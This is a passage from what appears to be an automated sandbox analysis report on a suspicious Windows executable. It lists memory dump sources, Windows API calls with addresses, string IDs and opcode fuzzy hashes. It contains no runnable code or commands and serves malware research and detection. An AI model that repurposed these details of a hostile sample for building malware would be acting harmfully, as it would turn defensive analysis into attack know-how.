                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3248276644-787714339
                            • Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                            • Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
                            • Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                            • Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE
                            APIs
                            • IsWindowVisible.USER32(?), ref: 0040506A
                            • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                              • Part of subcall function 0040408B: SendMessageA.USER32(00010420,00000000,00000000,00000000), ref: 0040409D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                            • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                            • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                            • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                            APIs
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004060CB,80000002), ref: 00405ECD
                            • RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405ED8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID: Call
                            • API String ID: 3356406503-1824292864
                            • Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                            • Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
                            • Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                            • Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4
                            APIs
                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\99200032052824.bat.exe,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405985
                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\99200032052824.bat.exe,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405993
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CharPrevlstrlen
                            • String ID: C:\Users\user\Desktop
                            • API String ID: 2709904686-3443045126
                            • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                            • Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
                            • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                            • Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD
                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73A3115B
                            • GlobalFree.KERNEL32(00000000), ref: 73A311B4
                            • GlobalFree.KERNEL32(?), ref: 73A311C7
                            • GlobalFree.KERNEL32(?), ref: 73A311F5
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: Global$Free$Alloc
                            • String ID:
                            • API String ID: 1780285237-0
                            • Opcode ID: 8c0729c6443fbc28da63bf50936a132f0167bb62015606205653a03d8c92b348
                            • Instruction ID: f65a7d46591abbd0f0064bc16403567b9fa7dedec8483f12cacafeda629228ed
                            • Opcode Fuzzy Hash: 8c0729c6443fbc28da63bf50936a132f0167bb62015606205653a03d8c92b348
                            • Instruction Fuzzy Hash: 5B3174B25082549FE701BF65DE47BA57FF8EB0B350BA8452FF84AC6298D7399502CB10
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: FreeGlobal$lstrcpy
                            • String ID:
                            • API String ID: 176019282-0
                            • Opcode ID: dcf54870f30ed684de1053074b5cc1713302c1457240a4451f36bb634416ba27
                            • Instruction ID: bea7c8a1aa76dab8730e12c5570bb9352b232b11e2056a844828a75874711ff8
                            • Opcode Fuzzy Hash: dcf54870f30ed684de1053074b5cc1713302c1457240a4451f36bb634416ba27
                            • Instruction Fuzzy Hash: 7B31BE7190424E8FCB22DFA4C9827D9BBFAFB4B310F94451BD196A2198C7349985CF50
                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                            • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                            • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                            • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                            • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                            • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q$$q$$q$$q$$q
                            • API String ID: 0-2069967915
                            • Opcode ID: 29577499ce52e7032996bbafa63acf828cf59d7851904d1decc7cfda4432d89d
                            • Instruction ID: 9410286fe9307fe0f1ab4f5746f5299a366320dbe190cf60280b04c259e39819
                            • Opcode Fuzzy Hash: 29577499ce52e7032996bbafa63acf828cf59d7851904d1decc7cfda4432d89d
                            • Instruction Fuzzy Hash: 46323F30E107198BDB15DFB8D85069DF7B2BFD9300F61C66AD449A7215EB30AE96CB80
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b98c648355a64bf1b2089f81d4750c7466ab6e07a95b5cb19f2355278a2b9009
                            • Instruction ID: bcf2175580eef62511e82647fca703077932f35e13edea9a896fad273d509800
                            • Opcode Fuzzy Hash: b98c648355a64bf1b2089f81d4750c7466ab6e07a95b5cb19f2355278a2b9009
                            • Instruction Fuzzy Hash: F353E831D10B198ACB51EF68C8805A9F7B1FF99300F15D79AE45877221EB70AAD5CF81
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af8fb7280e1fa74087a07116c4ff53ebc49e91d4e3cdf43c57cd74ed7c29dfde
                            • Instruction ID: 55687a09bed30aca85dc994b89de081ea562b142474aaad4dd981b80f1e5a273
                            • Opcode Fuzzy Hash: af8fb7280e1fa74087a07116c4ff53ebc49e91d4e3cdf43c57cd74ed7c29dfde
                            • Instruction Fuzzy Hash: CB332D31D10B198EDB11EF68C8906ADF7B1FF99300F15C79AE458A7211EB70AAD5CB81
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $
                            • API String ID: 0-3993045852
                            • Opcode ID: 2c5163811165361112889a167ce09fc70b2a4439bdc1a070ceee238019de0f0b
                            • Instruction ID: 6d2ba8ae85c2bc0a43847f5e98c70b39ceb36b59cd1550c0c46b8793a9c13378
                            • Opcode Fuzzy Hash: 2c5163811165361112889a167ce09fc70b2a4439bdc1a070ceee238019de0f0b
                            • Instruction Fuzzy Hash: 7C22A275E00209CFEB19DBA4C58079EBBB2EF89320F20846AD515EB355DB36DD42CB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: ]
                            • API String ID: 0-3352871620
                            • Opcode ID: 0548cbb8afbc8f10e2922fe1a4d61f7b269263bc678e7a8d0a600e51fc530e5c
                            • Instruction ID: 8eb608c959078b7ed8490be6f658efe27a4c733b4217c1b229f34896f795708a
                            • Opcode Fuzzy Hash: 0548cbb8afbc8f10e2922fe1a4d61f7b269263bc678e7a8d0a600e51fc530e5c
                            • Instruction Fuzzy Hash: 7D129135B002449FDB14DBA8C894AAEBBB2EF89310F248569E405EB395DF35DC56CB90
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 02005bc4d50f6db85752bad05d5c46b322567e30377055f354728fb6b765cda8
                            • Instruction ID: 185a1d74fe295a19c812bdb58711edf64eb7d9f11ab2455c7a621e8b24bffb04
                            • Opcode Fuzzy Hash: 02005bc4d50f6db85752bad05d5c46b322567e30377055f354728fb6b765cda8
                            • Instruction Fuzzy Hash: 4E922634A002048FDB24DB68D984BADBBF2FB45314F55C5AAD409AB361DB75EC96CF80
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c9abd098f5062b89fde460f6268d10bb6ae2f43a0fb4499d8522e3730732c6d6
                            • Instruction ID: 3e83b5b9b590827ebd2fef2a42597a240640d00b3673b97bb5c25d0c36c08cda
                            • Opcode Fuzzy Hash: c9abd098f5062b89fde460f6268d10bb6ae2f43a0fb4499d8522e3730732c6d6
                            • Instruction Fuzzy Hash: CA627D74A00204DFEB18DB68C594B9DB7F2EF88360F54856AE405EB351DB76ED86CB80
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8dbf7e01c14beed3385ad929d92160372745ba60ecee82ae9da84a9dd8336a35
                            • Instruction ID: 113fc73025d85e0596ffe5e391c4c9b4dcc70d5230f40da43069dfbc4b7add4e
                            • Opcode Fuzzy Hash: 8dbf7e01c14beed3385ad929d92160372745ba60ecee82ae9da84a9dd8336a35
                            • Instruction Fuzzy Hash: 1E328434B01205DFEB18DB68C590B9DB7B2FB88350F60852AD406EB351DB36EC52DB91
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac60d7d4675bcbb91b35dd12179433de26c25a296d52017bb8b5321590bab1cd
                            • Instruction ID: 31833c37e793eb33407ef9c7a7101b358d431dea98814ff2584699b347a4f2de
                            • Opcode Fuzzy Hash: ac60d7d4675bcbb91b35dd12179433de26c25a296d52017bb8b5321590bab1cd
                            • Instruction Fuzzy Hash: D6225234A01109DFFB18CB68C58079DB7B2FB85360FA4882BE445EB395DA36DD81CB91
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc6c95e34a47483564b27596c30370d58f2c4d7d61b431efc4f5c083ec35b934
                            • Instruction ID: 1d6f6a9d65970199dfe3742ca094d4908b7508a17d0c75dd3d0a1c83b183c1f2
                            • Opcode Fuzzy Hash: cc6c95e34a47483564b27596c30370d58f2c4d7d61b431efc4f5c083ec35b934
                            • Instruction Fuzzy Hash: 32B18A70E00219DFDB14CFA9DD817AEBBF2BF88314F148129D815AB394EB749891CB81
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8b1ed71f6af0eed9edd2f04a7fd3b5c2812213558b75a66a74abe20407e83c5
                            • Instruction ID: abcfb12799ec16fc7bb3876ff8973f09d0a34628ae7b4b98c9f70612cd02abfe
                            • Opcode Fuzzy Hash: b8b1ed71f6af0eed9edd2f04a7fd3b5c2812213558b75a66a74abe20407e83c5
                            • Instruction Fuzzy Hash: D1917C70E003099FDF14CFA9CD857AEBBF2AF88304F148529E455EB294EB749995CB81
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q$$q$$q$$q$$q
                            • API String ID: 0-2069967915
                            • Opcode ID: 609febd1f110a945c1db46bda10542e8196e0bab1634a918107220b144f129ad
                            • Instruction ID: e84d714100a846a46694154c0ddf53ab40ae0ed618fe1578325f86457011d8c7
                            • Opcode Fuzzy Hash: 609febd1f110a945c1db46bda10542e8196e0bab1634a918107220b144f129ad
                            • Instruction Fuzzy Hash: 04023F34A00209DBEB18CFA8C480B9DB7F6FB45360F64896AD405EB355DB36ED85CB91
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: fq$XPq$\Oq
                            • API String ID: 0-132346853
                            • Opcode ID: 787b725a91a94b41cb2157d19aa5279c1eedfc5c6f9189b4224d5b51ad1f6225
                            • Instruction ID: 666a224c94493931f1db72d9527ebee3d450b39dccb226ef7506e30faf85b070
                            • Opcode Fuzzy Hash: 787b725a91a94b41cb2157d19aa5279c1eedfc5c6f9189b4224d5b51ad1f6225
                            • Instruction Fuzzy Hash: CA617D30F002089FEB199BA5C8557AEBBF6FFC8310F20812AE106AB391DB754D459F90
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q
                            • API String ID: 0-3126353813
                            • Opcode ID: 9fd0b7622fc87735d894bcb700123df650f817e407c781d180ffeb036dfd639a
                            • Instruction ID: c61057ea0b02597bd15d66b1981ac9dd94bc1b589292400bdfd4f07916185adf
                            • Opcode Fuzzy Hash: 9fd0b7622fc87735d894bcb700123df650f817e407c781d180ffeb036dfd639a
                            • Instruction Fuzzy Hash: 34512B74B102059FDB58DB78C8A1B6E77F2EF88350F108469D909EB354EE35DC428B91
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: fq$XPq
                            • API String ID: 0-3167736908
                            • Opcode ID: 10dd0a52e28f8a246e058f7015999c865c869ee2af35f36e0a107548d99bacd5
                            • Instruction ID: 1f59683c2ea975f93d2294f34f4f2526bfddd0e15197a135cdc388d206097157
                            • Opcode Fuzzy Hash: 10dd0a52e28f8a246e058f7015999c865c869ee2af35f36e0a107548d99bacd5
                            • Instruction Fuzzy Hash: 82516170F002089FEB559BA5C8557AEBBF6FFC8700F20812AE116AB395DA758D419F90
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: LRq
                            • API String ID: 0-3187445251
                            • Opcode ID: 70c2223b2ac511379570f373d4d29208aee40a60586784f857439cf06aeedcc2
                            • Instruction ID: 7d9958f96d65e1a53aeb676af65b72b78f086fbc366a4f0f491f764bb8f66072
                            • Opcode Fuzzy Hash: 70c2223b2ac511379570f373d4d29208aee40a60586784f857439cf06aeedcc2
                            • Instruction Fuzzy Hash: 30510330705A118FDF248BB9CC9477A3BA7EF86310F25847AE446CB291DB29CC928791
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: PHq
                            • API String ID: 0-3820536768
                            • Opcode ID: d719bb42b7d9ddb544cb66d56d8458ed4398cdfe0e005d9f76460421bcad28e8
                            • Instruction ID: dca388de9c430ad25a65a54042de19912862014c6e31590becbbef72ea7b7d63
                            • Opcode Fuzzy Hash: d719bb42b7d9ddb544cb66d56d8458ed4398cdfe0e005d9f76460421bcad28e8
                            • Instruction Fuzzy Hash: 70419F74A00709DFEB149F75D49079EBBB6FF86750F20452AD401EB240DB72A946CB92
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: PHq
                            • API String ID: 0-3820536768
                            • Opcode ID: a3948c689e07814933a21871224cac554896ddc92036d56eac55b0385ba72a51
                            • Instruction ID: 1c90723f587d8ac702353533d22b777b15a0b73a197e5e1d2c952ca97e3d6ac9
                            • Opcode Fuzzy Hash: a3948c689e07814933a21871224cac554896ddc92036d56eac55b0385ba72a51
                            • Instruction Fuzzy Hash: C231C034B002048FEB19AF7489647AF7BE7AF85304B244A69D406DB395DF36CD46CB91
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: LRq
                            • API String ID: 0-3187445251
                            • Opcode ID: 49f71f7e467dfa9f3a241ebf5385b4d87f916b44f46a80b079c38afcefda462b
                            • Instruction ID: fe93fc9fe5de9fd2525fb3fb0070f07a2154e8e3e5f0d422f824e926360aa001
                            • Opcode Fuzzy Hash: 49f71f7e467dfa9f3a241ebf5385b4d87f916b44f46a80b079c38afcefda462b
                            • Instruction Fuzzy Hash: 7E314170E102199BDB24CFA9CC5179EBBB1FF85350F108526E406EB244EB75DC56CB51
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: LRq
                            • API String ID: 0-3187445251
                            • Opcode ID: 046c6863cb847595aee278761d915c3c6c1aafaca5d8b3573478f67c39f89454
                            • Instruction ID: a303458b22e9182b153d2f247bcd2e8203ba9653576172a9106c905d61c3a680
                            • Opcode Fuzzy Hash: 046c6863cb847595aee278761d915c3c6c1aafaca5d8b3573478f67c39f89454
                            • Instruction Fuzzy Hash: 0C317030E102199BEB25CFA5CC9079EBBB1FF95300F20852AE406FB255EB75D952CB41
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q
                            • API String ID: 0-1301096350
                            • Opcode ID: dfaa57801e4b75706e084c35156be6ea82b060eca01731e90be25f164bd2f857
                            • Instruction ID: 9a66a50822915d132f61878ab2305992fd5dc57a0590578ced6dc58711f088bd
                            • Opcode Fuzzy Hash: dfaa57801e4b75706e084c35156be6ea82b060eca01731e90be25f164bd2f857
                            • Instruction Fuzzy Hash: 48F0E539B0D391EBFF1C8988D8802797360EB803B2F204463D900A7200CB37EA02C750
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
